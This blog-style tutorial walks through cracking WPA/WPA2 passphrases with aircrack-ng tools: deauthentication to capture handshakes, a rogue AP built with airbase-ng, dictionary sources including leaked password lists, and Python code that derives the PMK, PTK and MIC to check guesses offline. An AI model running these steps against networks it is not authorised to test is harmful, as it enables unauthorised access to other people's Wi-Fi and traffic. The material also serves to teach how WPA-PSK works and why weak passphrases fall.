WPA Attacks

I. WPA PSK attack

  Recommended learning resource: http://etutorials.org/Networking/802.11+security.+wi-fi+protected+access+and+802.11i/

1. Cracking method

  WPA does not have WEP's cryptographic weaknesses, so the PSK can only be brute-forced. The factors that decide success are:

  • CPU resources
  • Time
  • Dictionary quality, which depends on its sources:
    • dictionaries shared online
    • leaked password lists
    • local telephone number ranges
    • dictionaries generated with Crunch
    • the wordlist files bundled with Kali

2. PSK cracking process

  • Start monitor mode
  • Start capturing and save the capture
  • Deauthentication attack to obtain the 4-way handshake (if no handshake is captured, break the existing connection)
  • Brute-force with a dictionary

3. Demonstration

  If no handshake is captured for a long time, the command below can be used to break the existing connection; the handshake can then be captured while the two sides automatically reconnect.

  • Location of the common Kali wordlists
┌──(root💀kali)-[/usr/share/wordlists]
└─# ls
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  wfuzz

II. WPA password cracking when the AP is not present

  • Start monitor mode
  • Start capturing and save the capture
  • Forge an AP with the same ESSID, based on the client's probe requests
  • Capture the first two messages of the 4-way handshake
  • Brute-force with a dictionary

1. Principle

  Based on the AP the target is probing for, we forge an AP with that ESSID. From the WPA authentication mechanism (figure above) we then know the ESSID, ANonce, SNonce, MAC1 and MAC2; the only value unknown to us is the PSK. The target sends the forged AP its SNonce together with a MIC computed from the PMK (derived from the PSK and the ESSID), ANonce, SNonce, MAC1 and MAC2. Because the algorithms involved are public, we can enumerate candidate PSK values, compute the MIC for each one and compare it with the MIC the target sent; when they match, the PSK has been recovered.

2. Cracking demonstration

  • Start monitor mode
┌──(root💀kali)-[/home/kali]
└─# iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          
                                                                                                      
┌──(root💀kali)-[/home/kali]
└─# airmon-ng start wlan0                     

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    530 NetworkManager
   1307 wpa_supplicant

PHY     Interface       Driver          Chipset

phy1    wlan0           rt2800usb       Ralink Technology, Corp. RT5370
                (mac80211 monitor mode vif enabled for [phy1]wlan0 on [phy1]wlan0mon)
                (mac80211 station mode vif disabled for [phy1]wlan0)

                                                                                                      
┌──(root💀kali)-[/home/kali]
└─# iwconfig 
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short  long limit:2   RTS thr:off   Fragment thr:off
          Power Management:off
  • Forge the AP

  airbase-ng help output

┌──(root💀kali)-[/home/kali]
└─# airbase-ng --help

  Airbase-ng 1.6  - (C) 2008-2020 Thomas d'Otreppe
  Original work: Martin Beck
  https://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)
      -n hex           : User specified ANonce when doing the 4-way handshake

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

  Example


┌──(root💀kali)-[/home/kali]
└─# airbase-ng --essid zmr -c 6 -Z 4  wlan0mon
03:04:33  Created tap interface at0
03:04:33  Trying to set MTU on at0 to 1500
03:04:34  Access Point with BSSID 1C:BF:CE:3B:5F:BE started.

  Parameters: -c sets the channel, -Z selects WPA2, and 4 selects CCMP encryption.

  • Capture and crack
┌──(root💀kali)-[/home/kali]
└─# airodump-ng wlan0mon --essid zmr -w wpa -c 6

  Note: the overall flow is as above, but the details may have problems, because in my own experiment the password was not recovered (the real password was in the dictionary).

  • Resolving the problem in the note (my own understanding)

  The station presumably keeps a local record of the real AP's MAC, and the MAC used when computing the MIC is actually the real AP's MAC. In other words, the MAC of our forged AP has to be set to the real AP's MAC; only then can the captured packets be cracked, as follows (this was not the same WiFi experiment, so the MAC differs from the one above):
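The derivation described in the principle section, and the reason behind the observation above about the AP MAC, as an added Python example (not from the original post; every handshake value below is constructed): it implements the IEEE 802.11i PSK-to-PMK, PTK and EAPOL MIC computations and shows that a MIC the station computed against the real AP's MAC does not verify for a forged AP with a different BSSID, even when the passphrase is correct.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, essid: str) -> bytes:
    # PSK -> PMK: PBKDF2-HMAC-SHA1 with the ESSID as salt, 4096 rounds, 256-bit output.
    # The ESSID salt is why the forged AP must carry the real network name, and the
    # 4096 rounds are the only thing that makes each dictionary guess expensive.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # IEEE 802.11i PRF-512: HMAC-SHA1 over label || 0x00 || data || counter, four blocks.
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]

def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    # The two MACs and the two nonces are sorted, so AP and station derive the same PTK.
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)

def eapol_mic(kck, eapol_frame, ccmp=True):
    # KCK = first 16 bytes of the PTK; the MIC covers the EAPOL frame with its MIC field
    # zeroed. WPA2/CCMP: HMAC-SHA1 truncated to 128 bits; WPA/TKIP: HMAC-MD5.
    digest = hashlib.sha1 if ccmp else hashlib.md5
    return hmac.new(kck, eapol_frame, digest).digest()[:16]

def mic_matches(passphrase, essid, ap_mac, sta_mac, anonce, snonce, eapol_frame, mic):
    kck = derive_ptk(derive_pmk(passphrase, essid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol_frame), mic)

# Constructed sample values (not taken from a real capture).
ESSID, PASSPHRASE = "zmr", "correct horse battery"
REAL_AP_MAC = bytes.fromhex("02de0fac1e01")   # constructed MAC of the real AP
ROGUE_AP_MAC = bytes.fromhex("1cbfce3b5fbe")  # BSSID the airbase-ng run above used
STA_MAC = bytes.fromhex("021122334455")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
# Handshake message 2 (EAPOL-Key, RSN descriptor) with the 16-byte MIC field zeroed.
EAPOL_M2_ZERO_MIC = (b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x00" + b"\x00" * 7 + b"\x01"
                     + SNONCE + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + b"\x00" * 16 + b"\x00\x00")

def demo():
    # The station computes its MIC with the real AP's MAC. A forged AP that uses its own
    # BSSID therefore collects a MIC that never verifies, even with the right passphrase.
    sta_kck = derive_ptk(derive_pmk(PASSPHRASE, ESSID), REAL_AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    sent_mic = eapol_mic(sta_kck, EAPOL_M2_ZERO_MIC)
    ok_real = mic_matches(PASSPHRASE, ESSID, REAL_AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZERO_MIC, sent_mic)
    ok_rogue = mic_matches(PASSPHRASE, ESSID, ROGUE_AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_M2_ZERO_MIC, sent_mic)
    return ok_real, ok_rogue  # (True, False)
```

The 4096-round PBKDF2 step is the only per-guess cost in this scheme, so passphrase length and randomness (or WPA3-SAE, which removes offline guessing altogether) are the practical defences.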

Tool for speeding up WiFi handshake cracking: https://www.cnblogs.com/z9m8r8/articles/16336553.html

posted @ z9m8r8 (157 views, 0 comments)